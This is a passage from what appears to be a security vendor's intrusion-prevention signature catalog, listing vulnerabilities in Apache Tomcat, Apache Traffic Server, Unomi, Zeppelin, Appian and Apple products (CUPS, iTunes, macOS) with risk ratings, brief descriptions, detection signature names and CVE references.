Software: Apache Tomcat
Type: Malfunction
Description: A remote code execution vulnerability exists in Apache Tomcat. The vulnerability is due to caching of attacker-controlled values in certain versions of Java. A remote, unauthenticated attacker can exploit this vulnerability by uploading a file with an allowed name, poisoning the cache, and accessing the uploaded file by using a crafted name. Successful exploitation could result in the execution of arbitrary code under the security context of the target service.
Situation: File-Text_Suspicious-Jsp-File-Content-Upload
References:
CVE-2024-56337
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56337
Back to top

Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Moderate
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: Insufficient validation of PUT requests causes a code execution vulnerability in Apache Tomcat. A successful exploit allows arbitrary code to be run remotely without authentication.
Situation: HTTP_CSU-Apache-Tomcat-HTTP-Put-Windows-Remote-Code-Execution
References:
CVE-2017-12615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12615
Back to top

Apache-Tomcat-HTTP2-Denial-of-Service

About this vulnerability: A vulnerability in Apache Tomcat
Risk: High
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: Apache Tomcat
Type: Malfunction
Description: A vulnerability in Apache Tomcat, versions 8.5.0 to 8.5.37 and 9.0.0.M1 to 9.0.14, which allows remote attackers to cause a denial of service condition by sending a large amount of HTTP/2 requests to the target server, due to the isufficient handling of excessive SETTINGS frames.
Situation: HTTP_CRL-Apache-Tomcat-HTTP2-Denial-of-Service
References:
CVE-2019-0199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0199
Back to top

Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549

About this vulnerability: A vulnerability in Apache Tomcat
Risk: High
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Platform: Generic
Software: Apache Tomcat
Type: Malfunction
Description: An denial of service vulnerability has been reported in the HTTP/2 module of Apache Tomcat. The vulnerability is due improper validation of HTTP/2 headers. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted HTTP/2 requests to the vulnerable server. Successful exploitation results in parsing an amount of data that leads to denial of service conditions.
Situation: HTTP_CS-Apache-Tomcat-HTTP2parser-Denial-Of-Service-CVE-2024-24549
References:
CVE-2024-24549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24549
Back to top

Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813

About this vulnerability: An attempt to exploit a vulnerability in Apache Tomcat detected
Risk: High
First detected in: sgpkg-ips-1851-5242
Last changed: sgpkg-ips-1852-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: Path equivalence: 'file.Name' (internal dot) leading to remote code execution and/or information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat. This issue affects Apache Tomcat from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.
Situation: HTTP_CSH-Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
File-Binary_Apache-Tomcat-Insecure-Deserialization-CVE-2025-24813
References:
CVE-2025-24813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24813
Back to top

Apache-Tomcat-JmxRemoteLifecycleListener-Remote-Code-Execution-CVE-2016-8735

About this vulnerability: An attempt to exploit a vulnerability in Apache Tomcat detected
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if "JmxRemoteLifecycleListener" is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.
Situation: Generic_CS-Suspicious-Java-Serialized-Object
References:
CVE-2016-8735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735
Back to top

Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Software Foundation Tomcat
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: A denial of service vulnerability has been identified in Apache Tomcat as it processes Chunked-Transfer encoded requests. The error is caused by Tomcat not discarding any extensions included in very long Chunked-transfer requests, even if they were not processed. This vulnerability is due to an incomplete fix for CVE-2012-3544. A remote attacker could exploit this vulnerability by sending a large amount of data to the server causing it to use up excessive resources. This can result in a limited denial of service condition.
Situation: HTTP_CSH-Apache-Tomcat-Large-Chunked-Transfer-Denial-Of-Service
References:
CVE-2013-4322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4322
BID-65767
http://www.securityfocus.com/bid/65767
OSVDB-103706
http://www.osvdb.org/103706
Back to top

Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution

About this vulnerability: An Apache Tomcat Manager Authenticated Upload Code Execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux
Software: Apache Tomcat
Type: Insecure Configuration
Description: A vulnerability in Apache Tomcat Manager which allows remote attackers to upload jsp applications as a WAR archive to the /manager/html/upload component.
Situation: HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution
HTTP_CS-Apache-Tomcat-Manager-Authenticated-Upload-Code-Execution-2
References:
CVE-2010-4094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4094
BID-36954
http://www.securityfocus.com/bid/36954
OSVDB-60176
http://www.osvdb.org/60176
Back to top

Apache-Tomcat-Maxparametercount-Denial-Of-Service

About this vulnerability: A vulnerability in Apache Tomcat
Risk: High
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: Apache Tomcat
Type: Resource Starvation
Description: A denial of service vulnerability has been reported for Apache Tomcat. This vulnerability is due to resource exhaustion in the Parameter component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: HTTP_CRL-Apache-Tomcat-Maxparametercount-Denial-Of-Service
References:
CVE-2023-28709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28709
Back to top

Apache-Tomcat-Mod_jk.so-URI-Worker-Long-Url-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Apache Tomcat mod_jk.so with long URLs
Risk: Moderate
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Apache Tomcat
Type: Buffer Overflow
Description: Apache Tomcat's JK Web Server Connector mod_jk.so contains a buffer overflow vulnerability in the handling of long URLs. A specially crafted URL can result in a stack-based buffer overflow and allow remote attackers to execute arbitrary code on the vulnerable host.
Situation: HTTP_CSH-ShellCode-In-User-Agent
HTTP_CSU-Apache-Tomcat-Mod-jk.so-URI-Worker-Long-Url-Buffer-Overflow-2
References:
CVE-2007-0774
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0774
BID-22791
http://www.securityfocus.com/bid/22791
Back to top

Apache-Tomcat-Servlet-Engine-Directory-Traversal

About this vulnerability: Directory traversal vulnerability in Apache Tomcat
Risk: Moderate
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1645-5242
Platform: Generic
Software: Apache Tomcat
Type: Directory Traversal
Description: There is a directory traversal vulnerability in Apache Tomcat. The vulnerability is due to an input validation error in Tomcat that does not properly sanitize the URI for the directory traversal patterns. Successful exploitation allows unauthenticated remote attackers to disclose or access arbitrary files on the vulnerable server.
Situation: HTTP_CSU-Apache-Tomcat-Servlet-Engine-Directory-Traversal-2
References:
CVE-2007-0450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
BID-22960
http://www.securityfocus.com/bid/22960
Back to top

Apache-Tomcat-Transfer-Encoding-Information-Disclosure

About this vulnerability: An Apache Tomcat Transfer-Encoding Information Disclosure vulnerability
Risk: Moderate
First detected in: sgpkg-ips-794-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Input Validation
Description: A vulnerability in Apache Tomcat, versions 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta, which allows remote attackers to obtain sensitive information via a crafted header due to the improper handling of an invalid Transfer-Encoding header.
Situation: HTTP_CS-Apache-Tomcat-Transfer-Encoding-Information-Disclosure
References:
CVE-2010-2227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227
BID-41544
http://www.securityfocus.com/bid/41544
OSVDB-66319
http://www.osvdb.org/66319
Back to top

Apache-Tomcat-User-Enumeration

About this vulnerability: An Apache Tomcat User Enumeration vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache Tomcat
Type: Configuration Error
Description: A vulnerability in Apache Tomcat, versions 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, which allows remote attackers to enumerate through valid usernames via requests to /j_security_check with malformed URL encoding of passwords.
Situation: HTTP_CRL-Apache-Tomcat-User-Enumeration
References:
CVE-2009-0580
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0580
BID-35196
http://www.securityfocus.com/bid/35196
OSVDB-55055
http://www.osvdb.org/55055
Back to top

Apache-Tomcat-WebSocket-Infinite-Loop-DoS

About this vulnerability: A vulnerability in Apache Tomcat
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1872-5242
Platform: Generic
Software: Apache Tomcat
Type: Infinite Loop
Description: A vulnerability in Apache Tomcat, versions 7.0.27 to 7.0.104, 8.5.0 to 8.5.56, and 9.0.0.M1 to 9.0.36, which allows remote attackers to cause a denial of service condition by sending crafted WebSocket requests to the vulnerable server, due to improper validation of extended payload lengths.
Situation: HTTP_CS-Apache-Tomcat-WebSocket-Infinite-Loop-DoS
References:
CVE-2020-13935
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13935
Back to top

Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection

About this vulnerability: A vulnerability in Apache Software Foundation Traffic Control
Risk: Moderate
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: Apache Software Foundation Traffic Control
Type: Input Validation
Description: Improper validation of the id field of the PUT /deliveryservice_request_comments endpoint causes an SQL injection vulnerability in Apache Traffic Control. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Apache-Traffic-Control-Deliveryservice_Request_Comments-SQL-Injection
References:
CVE-2024-45387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45387
Back to top

Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure

About this vulnerability: A vulnerability in Apache Software Foundation Traffic Server
Risk: Moderate
First detected in: sgpkg-ips-1103-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Malfunction
Description: There has been reported an information disclosure vulnerability in Apache Traffic Server. A remote attacker could exploit this vulnerability by sending a crafted ESI response to the target server.
Situation: File-Text_Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure
References:
CVE-2018-8040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8040
Back to top

Apache-Traffic-Server-HTTP-Range-Denial-Of-Service

About this vulnerability: An attempt to exploit a vulnerability in Apache Traffic Server detected
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Generic
Software: Apache Traffic Server
Type: Input Validation
Description: A vulnerability in Apache Traffic Server, versions prior to 9.2.2, which allows remote attackers to cause a denial of service condition by sending a crafted requests to the target server, due to the improper validation of HTTP Range headers.
Situation: HTTP_CSH-Apache-Traffic-Server-HTTP-Range-Denial-Of-Service
References:
CVE-2023-39456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39456
Back to top

Apache-Unomi-CVE-2020-13942-RCE

About this vulnerability: A vulnerability in Apache Unomi
Risk: High
First detected in: sgpkg-ips-1300-5242
Last changed: sgpkg-ips-1300-5242
Platform: Generic
Software: Apache Unomi
Type: Input Validation
Description: There exists a vulnerability in Apache Unomi, versions before 1.5.2, which allows remote attackers to execute arbitrary code via a crafted request, due to the insufficient validation of OGNL and MVEL2.
Situation: HTTP_CRL-Apache-Unomi-CVE-2020-13942-RCE
References:
CVE-2020-13942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13942
Back to top

Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apache Zeppelin.
Risk: High
First detected in: sgpkg-ips-1557-5242
Last changed: sgpkg-ips-1557-5242
Platform: Generic
Software: Apache Zeppelin
Type: Input Validation
Description: A vulnerability in Apache Software Foundation Zeppelin prior to 0.8.2 which allows remote attackers to execute arbitrary code on the target server by sending a crafted request, due to improper input validation of the usernames and roles of the note owners.
Situation: HTTP_CRL-Apache-Zeppelin-WebsocketEventFactory-Stored-Cross-Site-Scripting
References:
CVE-2022-46870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46870
Back to top

Appian-Enterprise-Business-Suite-DoS

About this vulnerability: An Appian Enterprise Business Suite DoS vulnerability
Risk: High
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Appian
Type: Malfunction
Description: A vulnerability in Appian Enterprise Business Suite, version 5.6 SP1, which allows remote attackers to cause a denial of service via a crafted packet to port tcp/5400.
Situation: Generic_CS-Appian-Enterprise-Business-Suite-DoS
References:
CVE-2007-6509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6509
OSVDB-39500
http://www.osvdb.org/39500
Back to top

Apple-CUPS-Cupsd-Privilege-Escalation

About this vulnerability: A vulnerability in Apple Computer Common UNIX Printing System (CUPS)
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple Common UNIX Printing System
Type: Malfunction
Description: An elevation-of-privilege vulnerability has been reported in the Apple CUPS. The vulnerability is due to improper processing of print-job or create-job requests sent to cupsd. A remote, unauthenticated attacker can send a specially crafted localized strings to cause the 'admin/conf' and 'admin' access control lists to fail. Successful exploitation could lead to elevation of privileges on the affected system, giving the attacker the ability to execute arbitrary code with root privileges.
Situation: HTTP_CS-Apple-CUPS-Cupsd-Privilege-Escalation
References:
CVE-2015-1158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1158
Back to top

Apple-CUPS-Cupsddoselect-Remote-Code-Execution

About this vulnerability: A vulnerability in Apple Common UNIX Printing System (CUPS)
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Malfunction
Description: There is a code execution vulnerability in Apple CUPS. The flaw is due to a use-after-free error within cupsdDoSelect function. Remote attackers could exploit this vulnerability by sending a malicious request to the target. Successful exploitation of this vulnerability would allow for arbitrary code execution with root privileges. In case if the attack is not successful, the vulnerable service may terminate abnormally due to memory corruption.
Situation: HTTP_CS-Apple-CUPS-Cupsddoselect-Remote-Code-Execution
References:
CVE-2009-3553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553
BID-37048
http://www.securityfocus.com/bid/37048
Back to top

Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Computer Common UNIX Printing System (CUPS)
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Buffer Overflow
Description: A heap buffer overflow exists in Common Unix Printing System (CUPS). The vulnerability exists in the gif_read_lzw function when handling compressed GIF images. A remote attacker can exploit this vulnerability by sending a specially crafted GIF image to a vulnerable service. Authentication may be required, depending on server configuration. Successful exploitation could result in arbitrary code executions with the privileges of the affected service.
Situation: File-GIF_Apple-CUPS-Gif_Read_LZW-Heap-Buffer-Overflow
References:
CVE-2011-3170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3170
BID-49323
http://www.securityfocus.com/bid/49323
OSVDB-74673
http://www.osvdb.org/74673
Back to top

Apple-CUPS-IPP-Use-After-Free-Memory-Corruption

About this vulnerability: A vulnerability in Apple Computer Common UNIX Printing System (CUPS)
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: OS X
Software: Common UNIX Printing System
Type: Malfunction
Description: A use-after-free memory corruption vulnerability exists in the implementation of Internet Printing Protocol (IPP) of the Common Unix Printing System (CUPS). This vulnerability is caused by improper handling of memory allocations and deallocations for multiple-valued attributes that have their values typed differently. A remote attacker can exploit this vulnerability by specially crafting a request to a CUPS server using the IPP protocol. Successful exploitation can result in execution of arbitrary code in the security context of the CUPS process or daemon, unsuccessful exploitation may result in a denial of service.
Situation: HTTP_CS-Apple-CUPS-IPP-Use-After-Free-Memory-Corruption
References:
CVE-2010-2941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941
BID-44530
http://www.securityfocus.com/bid/44530
OSVDB-68951
http://www.osvdb.org/68951
Back to top

Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow

About this vulnerability: A vulnerability in Apple Common UNIX Printing System
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Integer Overflow
Description: There exists a buffer overflow vulnerability in Apple's Common Unix Printing System distributed by multiple vendors.
Situation: HTTP_CS-Apple-CUPS-PNG-Filter-Overly-Large-Image-Height-Integer-Overflow
References:
BID-32518
http://www.securityfocus.com/bid/32518
Back to top

Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow

About this vulnerability: A vulnerability in Apple Common UNIX Printing System (CUPS)
Risk: High
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1296-5242
Platform: openSUSE; SUSE Linux; Ubuntu Linux; Red Hat Linux; Red Hat Enterprise Linux
Software: Apple Common UNIX Printing System
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Apple's Common Unix Printing System (CUPS) distributed by multiple vendors. The vulnerability is due to a boundary error in handling SGI Image format files. A remote attacker can exploit this vulnerability to compromise a vulnerable system. In an attack case where code injection is not successful, the affected application will terminate abnormally. In a more sophisticated attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, with the privileges of the printer user, normally lp.
Situation: HTTP_CS-Apple-CUPS-Sgi-Image-Format-Decoding-Imagetops-Filter-Buffer-Overflow
References:
CVE-2008-3639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3639
BID-31690
http://www.securityfocus.com/bid/31690
Back to top

Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting

About this vulnerability: A vulnerability in Apple Computer Common UNIX Printing System (CUPS)
Risk: Moderate
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Common UNIX Printing System
Type: Input Validation
Description: A Cross-Site Scripting vulnerability exists in the Apple CUPS Web Interface. The vulnerability is due to insufficient input validation while handling HTTP requests. A remote attacker can exploit this vulnerability by enticing a user to click on a link containing script code in the URL. Successful exploitation will result in the attacker-controlled script code being executed in the security context of the target user's browser session.
Situation: HTTP_CSU-Apple-CUPS-Web-Interface-URL-Handling-Cross-Site-Scripting
References:
CVE-2014-2856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856
BID-66788
http://www.securityfocus.com/bid/66788
OSVDB-105715
http://www.osvdb.org/105715
Back to top

Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159

About this vulnerability: A vulnerability in Apple Computer Common UNIX Printing System (CUPS)
Risk: High
First detected in: sgpkg-ips-657-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple Common UNIX Printing System
Type: Input Validation
Description: A cross-site scripting vulnerability exists in the Apple CUPS Web Interface. The vulnerability is due to insufficient input validation while handling HTTP requests. A remote attacker can exploit this vulnerability by enticing a user to click on a link containing script code in the URL. Successful exploitation will result in the attacker-controlled script code being executed in the security context of the target user's browser session.
Situation: HTTP_CSU-Apple-CUPS-Web-Interface-Url-Handling-Cross-Site-Scripting-CVE-2015-1159
References:
CVE-2015-1159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1159
Back to top

Apple-Finder-Dmg-Volume-Name-Memory-Corruption

About this vulnerability: A vulnerability in Apple Mac OS X Finder
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Input Validation
Description: There is a memory corruption vulnerability in the Finder application included in Apple Mac OS X. The flaw is due to improper bounds checking on the length of the Volume name in the DMG disk images. An attacker can exploit this vulnerability by enticing a user to open a crafted DMG disk image. Exploitation of the vulnerability may result in injection and execution of arbitrary code within the security context of the target user.
Situation: HTTP_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption
File-Binary_Apple-Computer-Finder-Dmg-Volume-Name-Memory-Corruption
References:
CVE-2007-0197
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0197
BID-21980
http://www.securityfocus.com/bid/21980
OSVDB-32714
http://www.osvdb.org/32714
Back to top

Apple-Ichat-Bonjour-Invalid-Pshs-Field-Denial-Of-Service

About this vulnerability: A vulnerability in Apple iChat Bonjour discovery protocol
Risk: Low
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1555-5242
Platform: Mac OS X
Software: Apple iChat AV
Type: Input Validation
Description: There is a denial of service vulnerability in the Apple iChat instant messaging application. A crafted packed broadcast using the Bonjour discovery protocol can be used to terminate the affected application.
References:
CVE-2007-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0614
BID-22304
http://www.securityfocus.com/bid/22304
OSVDB-32713
http://www.osvdb.org/32713
Back to top

Apple-iOS-Libtiff-Buffer-Overflow

About this vulnerability: An Apple iOS Libtiff Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: Apple iPhone Firmware
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Apple iPhone Firmware, versions before 3.8.2, in the TIFF library (libtiff) which allows remote attackers to execute arbitrary code.
Situation: File-Binary_Apple-iOS-Libtiff-Buffer-Overflow
References:
CVE-2006-3459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459
BID-19283
http://www.securityfocus.com/bid/19283
OSVDB-27723
http://www.osvdb.org/27723
Back to top

Apple-iTunes-M3u-Playlist-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in Apple Computer iTunes
Risk: High
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple iTunes
Type: Buffer Overflow
Description: Multiple buffer overflows have been discovered in Apple iTunes. The vulnerabilities are located in the code responsible for handling m3u files and can be triggered by overly long records in m3u files. An attacker can exploit this vulnerability by enticing a user to open an m3u file with iTunes or to view a specially crafted web page with an embedded m3u playlist. Successful exploitation could result in arbitrary code execution in the context of the currently logged in user.
References:
CVE-2012-0677
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0677
OSVDB-82897
http://www.osvdb.org/82897
Back to top

Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Apple iTunes
Risk: High
First detected in: sgpkg-ips-296-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple iTunes
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple iTunes. The error is due to improper bounds checking when copying user supplied data into a buffer. A remote attacker can exploit this vulnerability by enticing a user to open a specially crafted playlist (.pls) file. Successful exploitation of this vulnerability can lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
File-TextId_Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
References:
CVE-2009-2817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2817
BID-36478
http://www.securityfocus.com/bid/36478
Back to top

Apple-iTunes-Playlist-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in Apple iTunes
Risk: High
First detected in: sgpkg-ips-354-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple iTunes
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the Apple iTunes music player. The application does not perform sufficient validation of user supplied parameters in a play list file. This lack of validation allows for a fixed size buffer to be overrun which can result in a denial of service condition arbitrary code execution.
Situation: HTTP_SS-Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow
HTTP_SS-Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow
File-TextId_Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow
File-TextId_Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow
References:
CVE-2005-0043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0043
BID-12238
http://www.securityfocus.com/bid/12238
OSVDB-12833
http://www.osvdb.org/12833
Back to top

Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Apple iTunes
Risk: High
First detected in: sgpkg-ips-227-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apple iTunes
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Apple iTunes. A remote attacker can exploit this vulnerability by enticing a target user to visit a crafted website. A successful exploit may lead to non-privileged arbitrary code execution.
Situation: HTTP_SS-Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
File-Text_Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
References:
CVE-2009-0950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0950
BID-35157
http://www.securityfocus.com/bid/35157
OSVDB-54833
http://www.osvdb.org/54833
Back to top

Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow

About this vulnerability: A vulnerability in Apple Mac OS X
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Buffer Overflow
Description: There exists an integer overflow vulnerability in Apple Mac OS X ImageIO. The vulnerability is due to a boundary error in the "gifGetBandProc" function in ImageIO when decompressing a specially crafted GIF image file. Successful exploitation of this issue causes a denial of service condition and allows remote attackers to execute arbitrary code in the context of the application. In a simple attack case, the affected application (e.g. Safari) will terminate immediately when the malicious page is opened. In a sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the currently logged in user.
Situation: File-GIF_Apple-Mac-OS-X-Gifgetbandproc-Gif-Image-Handling-Integer-Overflow
References:
CVE-2007-1071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1071
BID-22630
http://www.securityfocus.com/bid/22630
OSVDB-34854
http://www.osvdb.org/34854
Back to top

Apple-Mac-OS-X-Installer-Package-Filename-Format-String-Vulnerability

About this vulnerability: A vulnerability in Apple Installer
Risk: Moderate
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Format String
Description: There is a format string vulnerability in the Apple Installer application. The flaw is due to improper sanity checks on package filename strings. An attacker can exploit this vulnerability by enticing a user to open a crafted package file to inject and execute arbitrary code on the target host within the security context of the target user, or potentially with System-level privileges.
Situation: HTTP_CSU-Apple-Installer-Package-Filename-Format-String-Vulnerability
References:
CVE-2007-0465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0465
BID-22272
http://www.securityfocus.com/bid/22272
OSVDB-32705
http://www.osvdb.org/32705
Back to top

Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure

About this vulnerability: .DS_Store attribute file requested
Risk: Low
First detected in: sgpkg-ips-532-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Configuration Error
Description: .DS_Store is a metadata file generated by OS X Finder. When present and available, the contents of this file may reveal information on the directory structure of the target system.
Situation: HTTP_CSU-Apple-Mac-OSX-DS-Store-Directory-Information-Disclosure
References:
BID-3324
http://www.securityfocus.com/bid/3324
OSVDB-6694
http://www.osvdb.org/6694
Back to top

Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176

About this vulnerability: A vulnerability in Apple Computer macOS Sonoma
Risk: Moderate
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Mac OS X
Software: <os>
Type: Input Validation
Description: Improper processing of JP2 files causes a buffer overflow vulnerability in MacOS. A successful exploitation allows an attacker to execute code on the target system.
Situation: File-JPEG_Apple-MacOS-ImageIO-Jp2-File-Parsing-Heap-Buffer-Overflow-CVE-2024-44176
References:
CVE-2024-44176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44176
Back to top

Apple-MacOS-ImageIO-Psd-File-Parsing-Heap-Buffer-Overflow-CVE-2024-40777

About this vulnerability: A vulnerability in Apple Computer macOS Sonoma
Risk: Moderate
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Mac OS X
